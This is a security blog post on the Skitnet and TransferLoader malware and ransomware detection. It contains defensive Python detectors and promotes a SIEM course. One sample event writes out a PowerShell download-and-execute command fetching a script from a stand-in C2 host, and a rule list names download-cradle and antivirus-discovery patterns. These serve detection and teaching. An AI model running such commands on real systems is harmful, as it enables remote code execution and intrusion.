Introduction

Several ransomware groups have recently adopted a powerful new malware known as Skitnet to aid in their post-exploitation activities. This malware facilitates data theft and grants remote access to compromised systems. First appearing on underground forums like RAMP in April 2024, Skitnet has seen increasing use in real-world cyberattacks, particularly since early 2025.

One notable example occurred in April 2025, when the Black Basta ransomware gang used Skitnet in phishing campaigns disguised as Microsoft Teams notifications. This malware’s stealthy nature and modular design have made it a popular choice among cybercriminals.

Technical Background and Capabilities

Also referred to as Bossnet, Skitnet is a multi-stage malware strain developed by a threat actor identified as LARVA-306. It is designed using modern programming languages like Rust and Nim, which allow it to avoid detection and establish covert connections with its command-and-control (C2) servers. One of its key features is the ability to launch a reverse shell over DNS, which enables persistent communication with the attacker without triggering traditional security alerts.

The malware also supports a wide range of functions, including remote access, data exfiltration, and downloading additional payloads using a .NET loader. These capabilities make it a highly versatile and dangerous tool in the hands of ransomware operators.

Execution Flow and Obfuscation Techniques

Skitnet is distributed as a compact malware package that includes both the server and client components. The infection process begins with a Rust-based binary that decrypts and executes an embedded Nim payload. This Nim component sets up a reverse shell that communicates via DNS lookups, making it harder for security systems to detect and analyze.

To further avoid detection, the malware uses the GetProcAddress API to dynamically resolve system function addresses, bypassing static import tables that are often monitored by antivirus software. It spawns multiple threads that perform DNS queries every 10 seconds, allowing attackers to send and receive commands through DNS responses.
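The two behaviours just described, a fixed 10-second DNS query cadence and random-looking query labels carrying encoded data, are exactly what a defender can hunt for in resolver logs. The following Python is an added example written for this article, not code from the original post or from any Skitnet analysis. It runs over a constructed resolver log (the hosts, clients and the `updates-cdn.test` zone are invented) and flags client/zone pairs whose queries are near-periodic and whose leftmost labels have high entropy; the "registered domain is the last two labels" simplification is an assumption that a real deployment would replace with a public-suffix lookup.

```python
import math
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample resolver log (not real traffic): "<timestamp> <client> <query name> <type>".
# Client 10.0.0.5 issues TXT lookups for random-looking labels exactly every 10 seconds;
# client 10.0.0.7 browses normally with irregular timing and readable hostnames.
SAMPLE_DNS_LOG = """\
2025-05-01T10:00:00Z 10.0.0.5 www.example.com A
2025-05-01T10:00:00Z 10.0.0.5 6a7f3c9e1b2d4e5f.updates-cdn.test TXT
2025-05-01T10:00:10Z 10.0.0.5 9c2e4d6f8a1b3c5d.updates-cdn.test TXT
2025-05-01T10:00:20Z 10.0.0.5 1f3e5d7c9b2a4c6e.updates-cdn.test TXT
2025-05-01T10:00:30Z 10.0.0.5 7b9d1f3e5a2c4e6f.updates-cdn.test TXT
2025-05-01T10:00:40Z 10.0.0.5 3e5f7a9c1d2b4f6a.updates-cdn.test TXT
2025-05-01T10:00:50Z 10.0.0.5 5d7f9b1e3c2a4d6f.updates-cdn.test TXT
2025-05-01T10:00:03Z 10.0.0.7 mail.example.com MX
2025-05-01T10:00:31Z 10.0.0.7 www.example.com A
2025-05-01T10:00:44Z 10.0.0.7 cdn.example.com A
2025-05-01T10:01:12Z 10.0.0.7 www.example.com A
2025-05-01T10:01:55Z 10.0.0.7 img.example.com A
2025-05-01T10:02:13Z 10.0.0.7 www.example.com A
"""


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character; random hex/base32 labels score far above hostnames."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_dns_log(text: str):
    """Parse the whitespace-separated log format used above into tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, qname, qtype = line.split()
        records.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                        client, qname.lower().rstrip("."), qtype))
    return records


def registered_domain(qname: str) -> str:
    # Assumption/simplification: the last two labels are the zone the attacker controls.
    labels = qname.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else qname


def detect_dns_beacons(log_text: str, min_queries: int = 5,
                       max_cv: float = 0.2, min_entropy: float = 3.0):
    """Flag (client, zone) pairs that query at near-constant intervals with random-looking labels."""
    groups = defaultdict(list)
    for ts, client, qname, _qtype in parse_dns_log(log_text):
        groups[(client, registered_domain(qname))].append((ts, qname))

    findings = []
    for (client, zone), entries in groups.items():
        if len(entries) < min_queries:
            continue
        entries.sort()
        times = [ts for ts, _ in entries]
        intervals = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean_iv = statistics.mean(intervals)
        if mean_iv <= 0:
            continue
        # Coefficient of variation: 0 means perfectly periodic; real browsing is bursty.
        # Implants that add jitter push this up, so treat the threshold as tunable.
        cv = statistics.pstdev(intervals) / mean_iv
        mean_ent = statistics.mean([shannon_entropy(q.split(".")[0]) for _, q in entries])
        if cv <= max_cv and mean_ent >= min_entropy:
            findings.append({"client": client, "zone": zone, "queries": len(entries),
                             "mean_interval_s": mean_iv, "interval_cv": round(cv, 3),
                             "mean_label_entropy": round(mean_ent, 2)})
    return findings


if __name__ == "__main__":
    for finding in detect_dns_beacons(SAMPLE_DNS_LOG):
        print(finding)
```

On the sample log only the 10.0.0.5 / updates-cdn.test pair is reported (six queries, 10-second mean interval, zero jitter, label entropy 3.75 bits); the normal browsing client is ignored because its timing is irregular and its hostnames are readable. Both thresholds are starting points: raise `max_cv` when hunting for implants that randomize their sleep, and pair the rule with a volume check, since a 10-second beacon produces thousands of queries per day to one zone.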

PowerShell Commands and Functionalities

Skitnet is capable of executing a range of PowerShell-based commands remotely. These include:

  • Startup: Adds shortcuts to the system’s Startup folder to maintain persistence.

  • Screen: Takes screenshots of the victim’s desktop.

  • Anydesk/Rutserv: Installs legitimate remote desktop tools like AnyDesk or Remote Utilities for manual access.

  • Shell: Executes PowerShell scripts hosted remotely and sends the results back to the C2 server.

  • AV: Collects information about installed security software on the victim’s system.

These functions help attackers control infected systems, gather intelligence, and prepare for further exploitation.
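Each of the commands listed above leaves an endpoint artefact that a SIEM can match. The following Python is an added example, not code from the original article or from any Skitnet sample: a small rule set run over constructed Sysmon-style events (EventID 1 process creation, EventID 11 file creation, with Sysmon's field names assumed). The rules map to the command list: a `.lnk` written into a user's Startup folder (Startup), PowerShell launched with a download-and-execute pattern (Shell), a remote-access tool process starting (AnyDesk/Rutserv, assuming `rutserv.exe` as the Remote Utilities host process name), and a WMI `SecurityCenter2` query, which is a common way to enumerate installed antivirus products (AV). The MITRE ATT&CK technique ids are the standard ones for those behaviours; the hostnames, paths and `c2.invalid` URL are invented.

```python
import json

# Constructed Sysmon-style events as JSON lines (EventID 1 = process creation,
# EventID 11 = file creation). None of these come from a real incident.
SAMPLE_EVENTS = r"""
{"EventID": 11, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetFilename": "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.lnk"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/s.ps1')\""}
{"EventID": 1, "Image": "C:\\ProgramData\\AnyDesk\\AnyDesk.exe", "CommandLine": "C:\\ProgramData\\AnyDesk\\AnyDesk.exe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -c Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct"}
{"EventID": 11, "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "TargetFilename": "C:\\Users\\alice\\Documents\\report.docx"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -c Get-ChildItem C:\\Temp"}
"""

# Per-user and all-users Startup folders both contain this path fragment.
STARTUP_FOLDER_MARKER = "\\start menu\\programs\\startup\\"
# Substrings typical of PowerShell fetching and running remote script content.
DOWNLOAD_CRADLE_TOKENS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
                          "invoke-expression", "iex ", "-encodedcommand", "frombase64string")
# Assumption: rutserv.exe is the Remote Utilities host process; anydesk.exe is AnyDesk.
REMOTE_ACCESS_TOOLS = {"anydesk.exe", "rutserv.exe"}
# WMI/CIM names used to enumerate registered antivirus products, plus Defender's status cmdlet.
AV_DISCOVERY_TOKENS = ("securitycenter2", "antivirusproduct", "get-mpcomputerstatus")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(event: dict):
    """Return (rule, ATT&CK technique) pairs that a single event matches."""
    hits = []
    event_id = event.get("EventID")
    if event_id == 11:
        target = event.get("TargetFilename", "").lower()
        if STARTUP_FOLDER_MARKER in target and target.endswith(".lnk"):
            hits.append(("startup_folder_shortcut", "T1547.001"))
    elif event_id == 1:
        image = basename(event.get("Image", ""))
        cmd = event.get("CommandLine", "").lower()
        if image in ("powershell.exe", "pwsh.exe") and any(t in cmd for t in DOWNLOAD_CRADLE_TOKENS):
            hits.append(("powershell_remote_script", "T1059.001"))
        if image in REMOTE_ACCESS_TOOLS:
            hits.append(("remote_access_tool_launched", "T1219"))
        if any(t in cmd for t in AV_DISCOVERY_TOKENS):
            hits.append(("security_software_discovery", "T1518.001"))
    return hits


def scan_events(jsonl: str):
    """Run every rule over a JSON-lines event stream and collect the matches."""
    findings = []
    for lineno, line in enumerate(jsonl.strip().splitlines(), start=1):
        event = json.loads(line)
        for rule, technique in check_event(event):
            findings.append({"line": lineno, "rule": rule, "technique": technique,
                             "image": basename(event.get("Image", ""))})
    return findings


if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding)
```

The first four sample events each trigger exactly one rule and the two benign events (Word saving a document, PowerShell listing a directory) trigger none. In production, the individual matches are low-to-medium fidelity on their own (administrators do install AnyDesk), so the useful signal is the sequence: a Startup shortcut, a remote script fetch and an AV inventory from the same host within minutes is the pre-ransomware pattern worth escalating.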

Emerging Threat: TransferLoader and Morpheus Ransomware

In related cybersecurity developments, Zscaler ThreatLabz recently disclosed a different malware loader called TransferLoader. This malware is being used to deploy the Morpheus ransomware, which specifically targeted an American law firm.

Active since February 2025, TransferLoader includes three core components: a downloader, a backdoor, and a loader. The downloader retrieves malicious payloads from a C2 server while displaying a benign PDF file as a decoy. The backdoor allows for remote command execution and configuration updates.

Of particular interest, TransferLoader uses the InterPlanetary File System (IPFS), a decentralized, peer-to-peer network, as an alternative channel for updating C2 instructions. The malware also employs obfuscation techniques to complicate reverse engineering and hinder analysis.

What This Means for Cybersecurity Professionals

Both Skitnet and TransferLoader highlight a growing trend in ransomware operations: the use of advanced evasion tactics and modular malware design. These tools demonstrate how threat actors are leveraging modern technologies and obscure communication channels to bypass security defenses and sustain control over infected environments. As these threats evolve, cybersecurity teams must remain vigilant and adapt their detection and response strategies accordingly.

As these advanced malware tools grow more evasive and modular, traditional defenses are often not enough. Attackers are continuously refining their methods, making it critical for defenders to understand the behaviors and signals that precede ransomware deployment.

That’s exactly where Logstail Academy’s training course comes in.

Combating Ransomware: Effective Detection using SIEM 

If you’re looking to enhance your ability to detect, analyze, and respond to ransomware threats like Skitnet or Morpheus, we invite you to enroll in our hands-on course:
Combating Ransomware: Effective Detection using SIEM.

Why This Course Matters:

  • Real-World Relevance: With ransomware strains growing more sophisticated, this course gives you the tools and techniques to stay ahead of the curve.

  • Platform-Focused Training: Learn how to use the Logstail SIEM platform to detect indicators of compromise, unusual file activity, and encryption attempts before real damage occurs.

  • Practical, Hands-On Learning: Simulate real attacks and build your response strategies in a controlled environment.

What You’ll Learn:

  • The inner workings of ransomware attacks and how modern variants operate

  • Step-by-step configuration of Logstail SIEM for threat detection

  • How to monitor and interpret log data to identify early warning signs

  • Setting up actionable alerts and response mechanisms

  • Best practices for hardening your environment against ransomware threats

Whether you’re a security analyst, system administrator, or IT manager, this course will equip you with the skills to defend your organization against today’s most pressing cybersecurity threats.

How Our SIEM Platform Detects and Mitigates Ransomware Threats in Real-Time

Ransomware continues to be one of the most disruptive cyber threats facing organizations today. From locking up mission-critical files to demanding hefty ransoms, these attacks have evolved in stealth and sophistication. But what if your security team could detect these threats before damage is done?

Enter Logstail’s SIEM Platform, a modern Security Information and Event Management solution designed to detect malicious behaviors such as ransomware activities with precision and speed.

Real-World Detection in Action

Our platform is equipped with advanced, pre-configured detection rules that identify ransomware behavior based on indicators like integrity checksum changes, command-line abuse, and suspicious PowerShell activity, all commonly seen in ransomware attacks like those involving Netcat or Powercat reverse shells.

In the training example above, the detection rule “Detect Possible Ransomware – Integrity checksum changed” flagged a critical alert. The real-time visualization on the SOAR interface highlights:

  • Severity: Critical (shown in deep red)

  • Status: Open

  • Agent: Automatically identifies the source

  • Detection Logic: Tied to the MITRE ATT&CK framework (e.g., attack.t1005)

Security analysts can instantly dig deeper by clicking the information icon (“!”), accessing detailed logs, and understanding exactly what triggered the alert and how to respond.
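The "integrity checksum changed" rule above is a file-integrity check: a baseline of file hashes is compared with the current state, and the alert fires on the pattern of changes rather than on any single file. The following Python is an added example, not Logstail's rule logic or code from the article: it baselines a directory with SHA-256, then grades a later comparison by how large a fraction of the baseline changed and whether the rewritten files look encrypted (near-8-bit byte entropy). The `demo()` function builds a throwaway directory, baselines it, and then rewrites six of its ten files with random bytes (renaming three) to stand in for an encryption run; the file names and thresholds are constructed for the example.

```python
import hashlib
import math
import os
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict:
    """Map of relative path -> SHA-256 for every file under root (the integrity checksum)."""
    root = Path(root)
    return {str(p.relative_to(root)): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def byte_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; encrypted or compressed data sits near 8.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def assess_changes(baseline: dict, root: Path, change_ratio_threshold: float = 0.3,
                   entropy_threshold: float = 7.0) -> dict:
    """Compare the tree against the baseline and grade the change pattern."""
    root = Path(root)
    current = build_baseline(root)
    modified = sorted(p for p, h in current.items() if p in baseline and baseline[p] != h)
    removed = sorted(p for p in baseline if p not in current)
    added = sorted(p for p in current if p not in baseline)
    # Rewritten or newly dropped files whose content looks encrypted.
    high_entropy = [p for p in modified + added
                    if byte_entropy((root / p).read_bytes()) >= entropy_threshold]
    change_ratio = (len(modified) + len(removed)) / max(len(baseline), 1)
    if change_ratio >= change_ratio_threshold and high_entropy:
        severity = "critical"   # many files changed and the new content is opaque
    elif change_ratio >= change_ratio_threshold:
        severity = "high"       # mass change, but content still looks structured
    elif high_entropy:
        severity = "medium"     # a few opaque files appeared; worth a look
    else:
        severity = "info"
    return {"severity": severity, "change_ratio": change_ratio, "modified": modified,
            "removed": removed, "added": added, "high_entropy": high_entropy}


def demo() -> dict:
    """Build a throwaway directory, baseline it, then mimic mass rewriting of its files."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for i in range(10):
            (root / f"report_{i}.txt").write_text(f"quarterly report {i}\n" * 50)
        baseline = build_baseline(root)
        # Constructed change: six files rewritten with random bytes, three of them also renamed.
        for i in range(6):
            target = root / f"report_{i}.txt"
            target.write_bytes(os.urandom(4096))
            if i < 3:
                target.rename(target.with_name(target.name + ".locked"))
        return assess_changes(baseline, root)


if __name__ == "__main__":
    result = demo()
    print(result["severity"], f"{result['change_ratio']:.0%} of baseline changed")
    print("high-entropy files:", result["high_entropy"])
```

The demo grades as critical: 60% of the baseline was modified or removed and all six rewritten files exceed the entropy threshold. The renamed files show up as a removal plus an addition, which is why the ratio counts removals and the entropy check also covers additions; a detector that only compared hashes of surviving paths would miss the half of an encryption run that changes extensions. Thresholds should be tuned per share, since a legitimate bulk import or backup restore can also change many files at once but will not produce opaque content.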

Why It Is Important

With ransomware attacks increasing in frequency and cost, early detection is no longer optional, it’s essential. Logstail’s SIEM platform ensures:

  • Proactive Monitoring: Catch ransomware before encryption occurs.

  • Automated Responses: Trigger scripts, notify teams, or isolate affected systems.

  • Clear Dashboards: Prioritize critical alerts and focus your incident response.

  • MITRE ATT&CK Integration: Correlate alerts with known adversary behaviors.

Ready to Fight Back Against Ransomware?

Join us at Logstail Academy and gain the practical knowledge and confidence you need to protect your organization from ransomware threats like Skitnet and beyond.

👉 Enroll Now in Combating Ransomware: Effective Detection using SIEM

Let’s build stronger cyber defenses together.

Contact Our Experts  or Sign Up for Free
